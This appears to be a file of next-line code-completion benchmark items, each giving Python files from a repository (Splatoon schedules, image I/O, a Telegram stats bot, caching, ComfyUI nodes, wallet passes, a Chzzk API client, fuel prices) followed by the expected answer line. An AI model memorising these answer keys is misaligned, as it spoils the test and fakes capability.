keeping track of binder sequence and complex predictions during binder hallucination. ''' def __init__(self, target_sequence: str, name, length=70, aa_freq={}, binder_sequence=None): """ target_sequence: amino acid sequence of target peptide (to bind) length: length of binder peptide binder_sequence: Optional, starting amino acid sequence of the binder aa_freq: dictionary containing the frequencies of each aa """ self.target_seq = target_sequence.upper() assert len(self.target_seq) > 0, "Target sequence must be provided" self.length = int(length) self.aa_freq = aa_freq # Get initial binder sequence if binder_sequence: assert self.length > 0, "Binder length must be greater than 0" self.init_binder_seq = binder_sequence.upper() else: self.init_binder_seq = ''.join(np.random.choice(list(aa_freq.keys()), size = length, p=list(aa_freq.values()))) self.binder_length = len(self.init_binder_seq) self.target_length = len(self.target_seq) self.chain_Ls = [self.binder_length, self.target_length] self.init_bound_seq = self.init_binder_seq + self.target_seq self.bound_length = len(self.init_bound_seq) # Initialize current and try sequences, self.current_binder_seq = self.init_binder_seq self.try_binder_seq = self.init_binder_seq self.current_bound_seq = self.init_bound_seq self.try_seq = self.init_bound_seq self.name=name def init_scores(self, scores): '''Initialise scores''' self.init_scores = scores self.current_scores = scores self.try_scores = scores def assign_scores(self, scores): '''Assign try scores. ''' self.try_scores = scores def update_scores(self): '''Update current scores to try scores.''' self.current_scores = copy.deepcopy(self.try_scores) @hydra.main(version_base=None, config_path='config', config_name='base') def main(conf: HydraConfig) -> None: """ Main function for running peptide binder hallucination. """ input_conf=conf.input output_conf=conf.output loss_conf=conf.loss model_conf=conf.model hallucination_conf=conf.hallucination os.makedirs(output_conf.out_dir, exist_ok=True) if output_conf.cautious and os.path.exists(f'{output_conf.out_dir}/{output_conf.out_prefix}_step_00000.pdb'): sys.exit(f'Specified output already exists. Exiting. To overwrite, provide output.cautious=False')
AA_freq=util.get_aa_freq(AA_FREQ, hallucination_conf.exclude_AA)
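The answer calls util.get_aa_freq, whose body is not shown in the prompt. A plausible sketch, an assumption rather than the repo's code, is to drop the excluded residues and renormalise so the probabilities still sum to 1 for np.random.choice:

# Hypothetical reimplementation of get_aa_freq; not taken from the repo.
import numpy as np

def get_aa_freq(aa_freq: dict, exclude_aa: str) -> dict:
    kept = {aa: f for aa, f in aa_freq.items() if aa not in exclude_aa}
    total = sum(kept.values())
    return {aa: f / total for aa, f in kept.items()}

freq = get_aa_freq({"A": 0.5, "C": 0.3, "W": 0.2}, exclude_aa="C")
assert abs(sum(freq.values()) - 1.0) < 1e-9
seq = ''.join(np.random.choice(list(freq.keys()), size=10, p=list(freq.values())))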
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Cypas/splatoon3-schedule # Path: nonebot_plugin_splatoon3_schedule/utils/dataClass.py class TimeUtil(object): @classmethod def parse_timezone(cls, timezone): """ Parse a timezone notation :param timezone: str eg: +8 :return: dict{symbol, offset} """ result = re.match(r"(?P<symbol>[+-])(?P<offset>\d+)", timezone) symbol = result.groupdict()["symbol"] offset = int(result.groupdict()["offset"]) return {"symbol": symbol, "offset": offset} @classmethod def convert_timezone(cls, dt, timezone="+0") -> datetime.datetime: """Input is assumed to be UTC; a timezone must be provided""" result = cls.parse_timezone(timezone) symbol = result["symbol"] offset = result["offset"] if symbol == "+": return dt + timedelta(hours=offset) elif symbol == "-": return dt - timedelta(hours=offset) else: raise Exception("dont parse timezone format") # Path: nonebot_plugin_splatoon3_schedule/config.py class Config(BaseModel): # Path: nonebot_plugin_splatoon3_schedule/utils/utils.py import datetime import cfscrape import httpx from httpx import Response from .dataClass import TimeUtil from ..config import plugin_config "Ranked Challenge": (227, 68, 17), "Ranked Open": (24, 200, 26), "X Schedule": (14, 205, 147), "打工": (14, 203, 146), "活动": (223, 42, 119), "祭典": (103, 103, 114), "祭典时间-金黄": (234, 255, 61), "上-武器卡片-黄": (234, 255, 61), "下-武器卡片-蓝": (96, 58, 255), "上-武器卡片": (255, 148, 157), "下-武器卡片": (124, 217, 127), "祭典结算项目卡片": (63, 63, 70, 70), } def cf_http_get(url: str): """cf get""" # Instantiate a create_scraper object scraper = cfscrape.create_scraper() # If requests error out, a delay can be added # scraper = cfscrape.create_scraper(delay = 6) if proxy_address: cf_proxies = { "http": "http://{}".format(proxy_address), "https": "http://{}".format(proxy_address), } # Fetch the page content via proxy res = scraper.get(url, proxies=cf_proxies) else: # Fetch the page content res = scraper.get(url) return res async def async_http_get(url: str) -> Response: """async http_get""" async with httpx.AsyncClient(proxies=proxies) as client: response = await client.get(url, timeout=HTTP_TIME_OUT) return response def http_get(url: str) -> Response: """http_get""" response = httpx.get(url, proxies=proxies, timeout=HTTP_TIME_OUT) return response def multiple_replace(text, _dict): """Batch-replace text""" for key in _dict: text = text.replace(key, _dict[key]) return text def get_expire_time() -> str: """Compute the expiry time string, precise to ymdh""" # Compute the expiry time time_now = get_time_now_china() time_now_h = time_now.hour # Build the expiry time string # Check whether the current hour is odd or even expire_time: datetime if (time_now_h % 2) == 0: # even expire_time = time_now + datetime.timedelta(hours=2) else: expire_time = time_now + datetime.timedelta(hours=1) expire_time_str = expire_time.strftime(time_format_ymdh).strip() return expire_time_str def time_converter(time_str) -> datetime: """Time conversion: year-month-day hour:minute:second""" # convert time to UTC+8 dt = datetime.datetime.strptime(time_str, "%Y-%m-%dT%H:%M:%SZ") dt += datetime.timedelta(hours=8) return dt def time_converter_yd(time_str): """Time conversion: month-day""" dt = time_converter(time_str) return datetime.datetime.strftime(dt, "%m.%d") def time_converter_hm(time_str): """Time conversion: hour:minute""" dt = time_converter(time_str) return datetime.datetime.strftime(dt, "%H:%M") def time_converter_mdhm(time_str): """Time conversion: month-day hour:minute""" dt = time_converter(time_str) return datetime.datetime.strftime(dt, "%m-%d %H:%M") def time_converter_weekday(time_str): """Time conversion: day of the week, e.g. Monday""" dt = time_converter(time_str) weekday = dt.weekday() return weekday def get_time_ymd(): """Get year-month-day""" dt = get_time_now_china().strftime("%Y-%m-%d") return dt def get_time_y() -> int: """Get the year""" year = get_time_now_china().year return year def get_time_now_china() -> datetime.datetime: """Get China (UTC+8) time""" # Get the UTC time, then convert it to UTC+8 utc_now = datetime.datetime.utcnow()
convert_now = TimeUtil.convert_timezone(utc_now, "+8")
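Editor's note: the row above centers on TimeUtil's offset arithmetic; here is a minimal, self-contained sketch of the same parsing (a standalone re-statement for illustration, not the repository's code):

import datetime
import re
from datetime import timedelta

def convert_timezone(dt, timezone="+0"):
    # parse "+8"/"-5" style offsets, mirroring TimeUtil.parse_timezone above
    m = re.match(r"(?P<symbol>[+-])(?P<offset>\d+)", timezone)
    offset = timedelta(hours=int(m.group("offset")))
    return dt + offset if m.group("symbol") == "+" else dt - offset

print(convert_timezone(datetime.datetime.utcnow(), "+8"))  # UTC shifted to UTC+8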
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.

====REPOSITORY====
# Repo Name: Sam-Izdat/tinycio

# Path: src/tinycio/fsio/format.py
class GraphicsFormat(IntEnum):
    """
    The graphics format of an image file to be saved or loaded.

    For a list of available options, see :ref:`ref_graphics_formats`.
    """
    UNKNOWN = 1<<0
    UINT8 = 1<<1
    UINT16 = 1<<2
    UINT32 = 1<<3
    SFLOAT16 = 1<<4
    SFLOAT32 = 1<<5
    UNORM8 = 1<<6
    UNORM16 = 1<<7
    UNORM32 = 1<<8

    # Lump together any integer-type values
    I8 = UINT8 | UNORM8
    I16 = UINT16 | UNORM16
    I32 = UINT32 | UNORM32
    UNORM = UNORM8 | UNORM16 | UNORM32

    READABLE = UINT8 | UINT16 | UINT32 | UNORM8 | UNORM16 | UNORM32 | SFLOAT16 | SFLOAT32
    WRITABLE_PNG = UINT8 | UINT16 | UNORM8 | UNORM16
    WRITABLE_TIF = SFLOAT16 | SFLOAT32
    WRITABLE_EXR = SFLOAT16 | SFLOAT32

# Path: src/tinycio/fsio/format.py
class ImageFileFormat(IntEnum):
    # TODO: Needs to be expanded after investigating iio support
    # NOTE: Not in user API right now, as it doesn't need to be
    UNKNOWN = 1<<0
    PNG = 1<<1
    JPG = 1<<2
    EXR = 1<<3
    TIFF = 1<<4
    WEBP = 1<<5

    # This is annoying, so let's just...
    TIF = TIFF
    JPEG = JPG

    # Supported bit depth
    UINT8 = PNG | JPG | WEBP
    UINT16 = PNG
    SFLOAT16 = EXR | TIFF
    SFLOAT32 = EXR | TIFF

# Path: src/tinycio/fsio/imagefile.py
import torch
import numpy as np
import typing
import os
import imageio.v3 as iio
from .format import GraphicsFormat, ImageFileFormat

def _infer_image_file_format(ext:str) -> ImageFileFormat:
    ext = ext.strip().lower()
    if ext == '.png':
        return ImageFileFormat.PNG
    elif ext == '.jpg':
        return ImageFileFormat.JPG
    elif ext == '.jpeg':
        return ImageFileFormat.JPG
    elif ext == '.exr':
        return ImageFileFormat.EXR
    elif ext == '.tif':
        return ImageFileFormat.TIFF
    elif ext == '.tiff':
        return ImageFileFormat.TIFF
    elif ext == '.webp':
        return ImageFileFormat.WEBP
    else:
        return ImageFileFormat.UNKNOWN
def load_image(fp:str, graphics_format:GraphicsFormat=GraphicsFormat.UNKNOWN) -> torch.Tensor:
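Editor's note: the extension dispatch above can equally be written as a table lookup; a hedged standalone sketch (hypothetical names, with a plain Enum standing in for the IntEnum flags above):

import os
from enum import Enum

FileFormat = Enum("FileFormat", "UNKNOWN PNG JPG EXR TIFF WEBP")

EXT_MAP = {
    ".png": FileFormat.PNG, ".jpg": FileFormat.JPG, ".jpeg": FileFormat.JPG,
    ".exr": FileFormat.EXR, ".tif": FileFormat.TIFF, ".tiff": FileFormat.TIFF,
    ".webp": FileFormat.WEBP,
}

def infer_format(path: str):
    # normalize the extension exactly as _infer_image_file_format does
    ext = os.path.splitext(path)[1].strip().lower()
    return EXT_MAP.get(ext, FileFormat.UNKNOWN)

print(infer_format("photo.JPEG"))  # FileFormat.JPG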
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.

====REPOSITORY====
# Repo Name: Dank-del/stats-bot

# Path: stats_bot/db/models.py
class Attachment(SQLModel, table=True):
    id: Optional[int] = Field(default=None, primary_key=True)
    user_id: int = Field(foreign_key="user.id")
    group_id: int = Field(foreign_key="group.id")
    message_id: int = Field()
    media_type: str
    timestamp: datetime = Field(default=datetime.utcnow)

# Path: stats_bot/db/models.py
class Message(SQLModel, table=True):
    id: Optional[int] = Field(default=None, primary_key=True)
    user_id: int = Field(foreign_key="user.id")
    group_id: int = Field(foreign_key="group.id")
    text: str
    timestamp: datetime = Field(default=datetime.utcnow)

# Path: stats_bot/db/models.py
class User(SQLModel, table=True):
    id: int = Field(primary_key=True)
    username: Optional[str] = Field(nullable=True)
    first_name: str
    last_name: Optional[str] = Field(nullable=True)

# Path: stats_bot/db/client.py
def load_tables():

# Path: stats_bot/decorators/admin.py
def admin(func):
    """
    Decorator that checks if the user is an admin before executing the wrapped function.

    Args:
        func (callable): The function to be wrapped.

    Returns:
        callable: The wrapped function.
    """
    async def wrapper(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
        member = await update.effective_chat.get_member(update.effective_user.id)
        if (
            member.status is not ChatMemberStatus.ADMINISTRATOR
            and member.status is not ChatMemberStatus.OWNER
        ):
            await update.message.reply_text("You are not an admin")
            return
        return await func(update, context)

    return wrapper

# Path: stats_bot/handlers/plot.py
import pandas as pd
import matplotlib.pyplot as plt
import io
from sqlmodel import Session, select
from telegram import Update
from telegram.ext import (
    ContextTypes,
)
from stats_bot.db.models import Attachment, Message, User
from stats_bot.db.client import engine
from stats_bot.decorators.admin import admin

@admin
async def plot_table(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
    """
    Generates a table of top 10 users by number of messages and average message length,
    and plots a bar chart to visualize the data.

    Args:
        update (Update): The update object containing information about the incoming message.
        context (ContextTypes.DEFAULT_TYPE): The context object containing bot-related information.

    Returns:
        None
    """
    msg = await update.effective_message.reply_text("Generating table...")
    data = []
    # fetch this data from database
    with Session(engine) as session:
        # users = session.exec(select(User)).all()
        messages = session.exec(
            select(Message).where(Message.group_id == update.effective_chat.id)
        ).all()
        # make a list of users, messages of whom are in the messages variable
        users = []
        for message in messages:
            if message.user_id not in users:
                users.append(message.user_id)
        # print(users)
        for user in users:
            usr = session.exec(select(User).where(User.id == user)).first()
            msgs = session.exec(
                select(Message.text).where(Message.user_id == usr.id)
            ).all()
            data.append((usr.username or str(usr.id), msgs))

    # Convert data to a pandas DataFrame
    df = pd.DataFrame(data, columns=["user_id", "messages"])
    print(df)
    df["num_messages"] = df["messages"].apply(len)
    # Calculate average message length per user
    df["avg_message_length"] = df["messages"].apply(
        lambda x: sum(len(message) for message in x) / len(x)
    )
    # Sort users by number of messages and average message length
    df = df.sort_values(by=["num_messages", "avg_message_length"], ascending=False)
    # Plot top 10 users
    top_10_users = df.head(10)
    plt.figure(figsize=(10, 6))
    plt.bar(
        top_10_users["user_id"],
        top_10_users["num_messages"],
        color="blue",
        alpha=0.6,
        label="Number of Messages",
    )
    plt.xlabel("User ID")
    plt.ylabel("Number of Messages")
    plt.title(
        f"Top 10 Users in {update.effective_chat.title} by Number of Messages and Average Message Length"
    )
    plt.legend()
    buf = io.BytesIO()
    plt.savefig(buf, format="png")
    buf.seek(0)
    await msg.delete()
    await context.bot.send_photo(
        chat_id=update.effective_chat.id,
        photo=buf,
        reply_to_message_id=msg.reply_to_message.message_id,
    )

@admin
async def attachment_stats(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
    """
    Generates a table of top 10 users by number of attachments sent,
    and plots a bar chart to visualize the data.

    Args:
        update (Update): The update object containing information about the incoming message.
        context (CallbackContext): The context object containing bot-related information.

    Returns:
        None
    """
    msg = await update.effective_message.reply_text("Generating attachment stats...")
    data = []
    # fetch this data from database
    with Session(engine) as session:
        attachments = session.exec(
select(Attachment).where(Attachment.group_id == update.effective_chat.id)
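Editor's note: the per-user aggregation in plot_table above reduces to two apply calls and a sort; a runnable toy-data distillation (invented values, not repository data):

import pandas as pd

df = pd.DataFrame({"user_id": ["a", "b"], "messages": [["hi", "hello"], ["yo"]]})
df["num_messages"] = df["messages"].apply(len)
df["avg_message_length"] = df["messages"].apply(lambda x: sum(len(m) for m in x) / len(x))
print(df.sort_values(by=["num_messages", "avg_message_length"], ascending=False))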
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.

====REPOSITORY====
# Repo Name: EzyGang/py-cachify

# Path: py_cachify/backend/clients.py
class AsyncWrapper:
    def __init__(self, cache: MemoryCache) -> None:
        self._cache = cache

    async def get(self, name: str, default: Any = None) -> Any:
        return self._cache.get(name=name, default=default)

    async def delete(self, *names: str) -> Any:
        self._cache.delete(*names)

    async def set(self, name: str, value: Any, ex: Union[int, None] = None) -> Any:
        self._cache.set(name=name, value=value, ex=ex)

# Path: py_cachify/backend/clients.py
class MemoryCache:
    def __init__(self) -> None:
        self._cache: Dict[str, Tuple[Any, Union[float, None]]] = {}

    def set(self, name: str, value: Any, ex: Union[int, None] = None) -> None:
        self._cache[name] = value, ex and time.time() + ex

    def get(self, name: str, default: Any = None) -> Any:
        val, exp_at = self._cache.get(name, (default, None))
        if not exp_at or exp_at > time.time():
            return val

        self.delete(name)
        return default

    def delete(self, *names: str) -> None:
        for key in names:
            if key not in self._cache:
                continue
            del self._cache[key]

# Path: py_cachify/backend/exceptions.py
class CachifyInitError(Exception):
    pass

# Path: py_cachify/backend/types.py
class AsyncClient(Protocol):
    async def get(self, name: str, default: Any = None) -> Any:
        raise NotImplementedError

    async def delete(self, *names: str) -> Any:
        raise NotImplementedError

    async def set(self, name: str, value: Any, ex: Union[int | None] = None) -> Any:
        raise NotImplementedError

# Path: py_cachify/backend/types.py
class SyncClient(Protocol):
    def get(self, name: str, default: Any = None) -> Any:
        raise NotImplementedError

    def delete(self, *names: str) -> Any:
        raise NotImplementedError

    def set(self, name: str, value: Any, ex: Union[int | None] = None) -> Any:
        raise NotImplementedError

# Path: py_cachify/backend/lib.py
import pickle
from typing import Any, Union

from py_cachify.backend.clients import AsyncWrapper, MemoryCache
from py_cachify.backend.exceptions import CachifyInitError
from py_cachify.backend.types import AsyncClient, SyncClient

from __future__ import annotations

class Cachify:
    def __init__(
self, sync_client: Union[SyncClient, MemoryCache], async_client: Union[AsyncClient, AsyncWrapper], prefix: str
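Editor's note: a minimal exercise of the MemoryCache shown in the row above (assumes that class is in scope; per its set/get logic, the expiry is stored as an absolute timestamp and expired keys fall back to the default):

import time

cache = MemoryCache()
cache.set("answer", 42, ex=1)      # expire after one second
assert cache.get("answer") == 42
time.sleep(1.1)
assert cache.get("answer", default="gone") == "gone"  # expired entry was evicted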
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.

====REPOSITORY====
# Repo Name: lldacing/comfyui-easyapi-nodes

# Path: easyapi/util.py
def tensor_to_pil(image):
    return Image.fromarray(np.clip(255. * image.cpu().numpy().squeeze(), 0, 255).astype(np.uint8))

# Path: easyapi/util.py
def pil_to_tensor(image):
    return torch.from_numpy(np.array(image).astype(np.float32) / 255.0).unsqueeze(0)

# Path: easyapi/util.py
def base64_to_image(base64_string):
    # strip the prefix
    base64_list = base64_string.split(",", 1)
    if len(base64_list) == 2:
        prefix, base64_data = base64_list
    else:
        base64_data = base64_list[0]
    # decode the image data from the base64 string
    image_data = base64.b64decode(base64_data)
    # create an in-memory stream
    image_stream = io.BytesIO(image_data)
    # open the image data with PIL's Image module
    image = Image.open(image_stream)
    return image

# Path: easyapi/util.py
def image_to_base64(pli_image, pnginfo=None):
    # create a BytesIO object to hold the image data temporarily
    image_data = io.BytesIO()
    # save the image into the BytesIO object, in PNG format
    pli_image.save(image_data, format='PNG', pnginfo=pnginfo)
    # get the BytesIO contents as a byte string
    image_data_bytes = image_data.getvalue()
    # encode the image data as a base64 string
    encoded_image = "data:image/png;base64," + base64.b64encode(image_data_bytes).decode('utf-8')
    return encoded_image

# Path: easyapi/util.py
def read_image_from_url(image_url):
    response = requests.get(image_url)
    img = Image.open(io.BytesIO(response.content))
    return img

# Path: easyapi/ImageNode.py
import base64
import copy
import io
import numpy as np
import torch
import json
from PIL import ImageOps, Image
from nodes import LoadImage
from comfy.cli_args import args
from PIL.PngImagePlugin import PngInfo
from json import JSONEncoder, JSONDecoder
from easyapi.util import tensor_to_pil, pil_to_tensor, base64_to_image, image_to_base64, read_image_from_url

class LoadImageFromURL:
    """
    Read images from remote URLs
    """
    @classmethod
    def INPUT_TYPES(self):
        return {"required": {
            "urls": ("STRING", {"multiline": True, "default": "", "dynamicPrompts": False}),
        },
        }

    RETURN_TYPES = ("IMAGE", "MASK")
    RETURN_NAMES = ("images", "masks")
    FUNCTION = "convert"
    CATEGORY = "EasyApi/Image"
    # INPUT_IS_LIST = False
    OUTPUT_IS_LIST = (True, True,)

    def convert(self, urls):
        urls = urls.splitlines()
        images = []
        masks = []
        for url in urls:
            if not url.strip().isspace():
                i = read_image_from_url(url.strip())
                i = ImageOps.exif_transpose(i)
                image = i.convert("RGB")
                image = pil_to_tensor(image)
                images.append(image)
                if 'A' in i.getbands():
                    mask = np.array(i.getchannel('A')).astype(np.float32) / 255.0
                    mask = 1. - torch.from_numpy(mask)
                else:
                    mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
                masks.append(mask)

        return (images, masks, )

class LoadMaskFromURL:
    """
    Read images from remote URLs
    """
    _color_channels = ["red", "green", "blue", "alpha"]

    @classmethod
    def INPUT_TYPES(self):
        return {
            "required": {
                "urls": ("STRING", {"multiline": True, "default": "", "dynamicPrompts": False}),
                "channel": (self._color_channels, {"default": self._color_channels[0]}),
            },
        }

    RETURN_TYPES = ("MASK", )
    RETURN_NAMES = ("masks", )
    FUNCTION = "convert"
    CATEGORY = "EasyApi/Image"
    # INPUT_IS_LIST = False
    OUTPUT_IS_LIST = (True, True,)

    def convert(self, urls, channel=_color_channels[0]):
        urls = urls.splitlines()
        masks = []
        for url in urls:
            if not url.strip().isspace():
                i = read_image_from_url(url.strip())
                # the code below follows LoadImage
                i = ImageOps.exif_transpose(i)
                if i.getbands() != ("R", "G", "B", "A"):
                    i = i.convert("RGBA")
                c = channel[0].upper()
                if c in i.getbands():
                    mask = np.array(i.getchannel(c)).astype(np.float32) / 255.0
                    mask = torch.from_numpy(mask)
                    if c == 'A':
                        mask = 1. - mask
                else:
                    mask = torch.zeros((64, 64), dtype=torch.float32, device="cpu")
                masks.append(mask)

        return (masks,)

class Base64ToImage:
    """
    Convert base64-encoded images back into image tensors
    """
    @classmethod
    def INPUT_TYPES(self):
        return {"required": {
            "base64Images": ("STRING", {"multiline": True, "default": "[\"\"]", "dynamicPrompts": False}),
        },
        }

    RETURN_TYPES = ("IMAGE", "MASK")
    # RETURN_NAMES = ("image", "mask")
    FUNCTION = "convert"
    CATEGORY = "EasyApi/Image"
    # INPUT_IS_LIST = False
    OUTPUT_IS_LIST = (True, True)

    def convert(self, base64Images):
        # print(base64Image)
        base64ImageJson = JSONDecoder().decode(s=base64Images)
        images = []
        masks = []
        for base64Image in base64ImageJson:
i = base64_to_image(base64Image)
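Editor's note: a self-contained round-trip mirroring image_to_base64/base64_to_image from the row above (PIL only, synthetic 4x4 image):

import base64
import io
from PIL import Image

img = Image.new("RGB", (4, 4), "red")
buf = io.BytesIO()
img.save(buf, format="PNG")
b64 = "data:image/png;base64," + base64.b64encode(buf.getvalue()).decode("utf-8")

data = base64.b64decode(b64.split(",", 1)[1])  # strip the data-URI prefix
restored = Image.open(io.BytesIO(data))
assert restored.size == (4, 4)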
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.

====REPOSITORY====
# Repo Name: bersegosx/passosh

# Path: src/passosh/fields.py
class HeaderField:
    """
    An object that represents the fields that display information at the top of a pass.
    """
    key: str
    value: str
    label: str = ''
    textAlignment: str = TextAlignment.NATURAL
    changeMessage: str = ''

# Path: src/passosh/fields.py
class PrimaryField:
    """
    An object that represents the fields that display the most important information on a pass.
    """
    key: str
    value: str
    label: str = ''
    changeMessage: str = ''

# Path: src/passosh/fields.py
class SecondaryField:
    """
    An object that represents the fields that display supporting information on the front of a pass.
    """
    key: str
    value: str
    label: str = ''
    textAlignment: str = TextAlignment.NATURAL
    changeMessage: str = ''

# Path: src/passosh/fields.py
class BackField:
    """
    An object that represents the fields that display information on the back of a pass.
    """
    key: str
    value: str
    label: str = ''
    textAlignment: str = TextAlignment.LEFT
    changeMessage: str = ''

# Path: src/passosh/fields.py
class AuxiliaryField:
    """
    An object that represents the fields that display additional information on the front of a pass.
    """
    key: str
    value: str
    label: str = ''
    textAlignment: str = TextAlignment.NATURAL
    changeMessage: str = ''
    row: int = 0

# Path: src/passosh/fields.py
class Barcode:
    message: str
    format: BarcodeFormat
    messageEncoding: str = 'iso-8859-1'
    altText: str = ''  # isn’t displayed for watchOS

# Path: src/passosh/fields.py
class BoardingPassTransitType(str, Enum):
    GENERIC = 'PKTransitTypeGeneric'
    AIR = 'PKTransitTypeAir'
    BOAT = 'PKTransitTypeBoat'
    BUS = 'PKTransitTypeBus'
    TRAIN = 'PKTransitTypeTrain'

# Path: src/passosh/fields.py
class Location:
    """
    An object that represents a location that the system uses to show a relevant pass.
    """
    latitude: float  # in degrees, of the location
    longitude: float  # in degrees, of the location
    altitude: float | None = None  # in meters, of the location

    # the text to display on the lock screen when the pass is relevant.
    # For example, a description of a nearby location, such as “Store nearby on 1st and Main”.
    relevantText: str | None = None

# Path: src/passosh/pesso.py
from dataclasses import dataclass

from .fields import (HeaderField, PrimaryField, SecondaryField, BackField, AuxiliaryField,
                     Barcode, BoardingPassTransitType, Location)

@dataclass
class Content:
    """
    An object that represents the groups of fields that display the information for an event ticket.
    """
    headerFields: list[HeaderField] | None = None
    primaryFields: list[PrimaryField] | None = None
secondaryFields: list[SecondaryField] | None = None
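Editor's note: a hypothetical construction of the Content group above (assumes the field classes from src/passosh/fields.py accept keyword arguments as dataclasses; the key/value strings are invented for illustration):

content = Content(
    headerFields=[HeaderField(key="gate", value="B12", label="GATE")],
    primaryFields=[PrimaryField(key="dest", value="SFO", label="TO")],
)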
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.

====REPOSITORY====
# Repo Name: jonghwanhyeon/python-chzzk

# Path: chzzk/client.py
class ChzzkClient(HTTPClient):
    BASE_URL = "https://api.chzzk.naver.com/"

    def __init__(self, credential: Optional[Credential] = None):
        super().__init__(credential)

# Path: chzzk/client.py
class Credential:
    auth: str
    session: str

    def as_cookie(self) -> dict[str, str]:
        return {
            "NID_AUT": self.auth,
            "NID_SES": self.session,
        }

# Path: chzzk/client.py
class GameClient(HTTPClient):
    BASE_URL = "https://comm-api.game.naver.com/nng_main/"

    def __init__(self, credential: Optional[Credential] = None):
        super().__init__(credential)

# Path: chzzk/models.py
class Channel(PartialChannel):
    channel_type: Optional[str] = None
    channel_description: str
    follower_count: int
    open_live: bool

# Path: chzzk/models.py
class ChannelSearchRecord(SearchRecord):
    channel: Channel

# Path: chzzk/models.py
class LiveDetail(Live):
    status: str
    close_date: Optional[Annotated[datetime, AfterValidator(to_kst)]] = None
    chat_active: bool
    chat_available_group: str
    paid_promotion: bool
    chat_available_condition: str
    min_follower_minute: int
    channel: PartialChannel
    live_polling_status: Json[LivePollingStatus] = Field(alias="livePollingStatusJson")

# Path: chzzk/models.py
class LiveSearchRecord(SearchRecord):
    live: Live
    channel: PartialChannel

# Path: chzzk/models.py
class LiveStatus(RawModel):
    live_title: str
    status: str
    concurrent_user_count: int
    accumulate_count: int
    paid_promotion: bool
    adult: bool
    chat_channel_id: str
    category_type: Optional[str] = None
    live_category: Optional[str] = None
    live_category_value: str
    live_polling_status: Json[LivePollingStatus] = Field(alias="livePollingStatusJson")
    fault_status: Any

# Path: chzzk/models.py
class SearchCursor(RawModel, Generic[T]):
    size: int
    page: Optional[Page] = None
    data: list[T]

# Path: chzzk/models.py
class User(RawModel):
    has_profile: bool
    user_id_hash: Optional[str] = None
    nickname: Optional[str] = None
    profile_image_url: Optional[str] = None
    penalties: Optional[list[Any]] = None
    official_noti_agree: bool
    official_noti_agree_updated_date: Optional[str] = None
    verified_mark: bool
    logged_in: bool

# Path: chzzk/models.py
class Video(PartialVideo):
    paid_promotion: bool
    in_key: str
    live_open_date: Annotated[datetime, AfterValidator(to_kst)]
    vod_status: str
    prev_video: Optional[PartialVideo] = None
    next_video: Optional[PartialVideo] = None

# Path: chzzk/models.py
class VideoSearchRecord(SearchRecord):
    video: VideoMetadata
    channel: PartialChannel

# Path: chzzk/chzzk.py
from typing import Optional

from chzzk.client import ChzzkClient, Credential, GameClient
from chzzk.models import (
    Channel,
    ChannelSearchRecord,
    LiveDetail,
    LiveSearchRecord,
    LiveStatus,
    SearchCursor,
    User,
    Video,
    VideoSearchRecord,
)

class ChzzkLive:
    def __init__(self, client: ChzzkClient):
        self._client = client

    async def status(self, channel_id: str) -> LiveStatus:
        response = await self._client.get(f"polling/v1/channels/{channel_id}/live-status")
        return LiveStatus(**response)

    async def detail(self, channel_id: str) -> LiveDetail:
        response = await self._client.get(f"service/v1/channels/{channel_id}/live-detail")
        return LiveDetail(**response)

class ChzzkSearch:
    def __init__(self, client: ChzzkClient):
        self._client = client

    async def channels(self, keyword: str, size: int = 12, offset: int = 0) -> SearchCursor[ChannelSearchRecord]:
        response = await self._client.get(
            "service/v1/search/channels",
            params={
                "keyword": keyword,
                "size": size,
                "offset": offset,
            },
        )
        return SearchCursor[ChannelSearchRecord](**response)

    async def lives(self, keyword: str, size: int = 12, offset: int = 0) -> SearchCursor[LiveSearchRecord]:
        response = await self._client.get(
            "service/v1/search/lives",
            params={
                "keyword": keyword,
                "size": size,
                "offset": offset,
            },
        )
        return SearchCursor[LiveSearchRecord](**response)
async def videos(self, keyword: str, size: int = 12, offset: int = 0) -> SearchCursor[VideoSearchRecord]:
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.

====REPOSITORY====
# Repo Name: pantherale0/ha-fuelprices

# Path: custom_components/fuel_prices/const.py
CONF_AREAS = "areas"

# Path: custom_components/fuel_prices/const.py
DOMAIN = "fuel_prices"

# Path: custom_components/fuel_prices/entity.py
class FeulStationEntity(CoordinatorEntity):
    """Represents a fuel station."""

    def __init__(
        self, coordinator: FuelPricesCoordinator, fuel_station_id, entity_id, source
    ) -> None:
        """Initialize."""
        super().__init__(coordinator)
        self.coordinator: FuelPricesCoordinator = coordinator
        self._fuel_station_id = fuel_station_id
        self._entity_id = entity_id
        self._fuel_station_source = str(source).lower()

    @property
    def _fuel_station(self):
        """Return the fuel station."""
        return self.coordinator.api.configured_sources[
            self._fuel_station_source
        ].location_cache[self._fuel_station_id]

    @property
    def unique_id(self) -> str | None:
        """Return unique ID."""
        return f"fuelprices_{self._fuel_station_id}_{self._entity_id}"

# Path: custom_components/fuel_prices/coordinator.py
class FuelPricesCoordinator(DataUpdateCoordinator):
    """Fuel Prices data coordinator."""

    def __init__(self, hass: HomeAssistant, api: FuelPrices, name: str) -> None:
        """Init the coordinator."""
        super().__init__(
            hass=hass,
            logger=_LOGGER,
            name=name,
            update_interval=timedelta(minutes=30),
        )
        self.api: FuelPrices = api

    async def _async_update_data(self):
        """Fetch and update data from the API."""
